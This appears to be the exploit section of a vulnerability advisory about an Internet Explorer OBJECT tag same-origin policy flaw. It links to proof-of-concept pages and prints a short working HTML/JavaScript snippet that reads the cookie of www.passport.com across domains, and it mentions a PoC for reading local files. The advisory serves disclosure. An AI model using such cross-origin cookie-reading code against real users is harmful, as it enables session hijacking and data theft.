• info
• discussion
• exploit
• solution
• references

Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability

Thor Larholm <thor@pivx.com> has provided proof of concept exploits at the following location:

http://www.PivX.com/larholm/adv/TL003/

The following example, also provided, will display the cookie associated with the domain www.passport.com:

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>

A proof-of-concept is available which demonstrates that this issue may be exploited to read some non-parseable files (such as .ini and .bat extensions):

http://www.murphy.101main.net/localread.htm